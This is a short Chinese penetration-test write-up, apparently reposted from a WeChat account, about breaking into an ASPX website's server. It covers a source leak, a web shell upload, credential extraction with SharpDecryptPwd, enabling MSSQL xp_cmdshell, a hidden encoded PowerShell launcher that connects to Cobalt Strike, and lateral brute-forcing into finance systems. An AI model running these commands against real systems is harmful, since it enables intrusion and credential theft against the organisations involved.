通过前期信息搜集获取到目标站的80xx端口
发现一处源码泄露
查看配置文件
登录manage.aspx
上传shell
发现安装了TeamViewer
看下进程如果运行tv的话,可直接读取其远程的账号密码
https://github.com/uknowsec/SharpDecryptPwd
SharpDecryptPwd
对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp)。
本地演示如下
翻找文件,jar包反编译,获取到数据库账号密码和redis密码
由于shell不是system权限,且存在多个杀软。
利用免杀frp代理,利用数据库提权
xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。
开启xp_cmdshell
execsp_configure 'show advanced options', 1;reconfigure;
execsp_configure 'xp_cmdshell',1;reconfigure;
添加用户并添加到管理员组
由于装了天q,新添加的用户无法登录。
那么利用数据库执行命令,上线cs
cmdshell执行时需要编码一下
EXEC master.dbo.xp_cmdshell 'powershell.exe -nop -w hidden -enc xxxxxxxxxxxxxxxxxxxxxxx'
上线cs,抓取密码
利用获取的密码进行横向爆破
发现多台服务器桌面存在密码本和连接生产系统的Anydesk
财务系统
内网没有域,就搞搞数据库和系统了。
本文始发于微信公众号(疯猫网络):记一次aspx网站渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论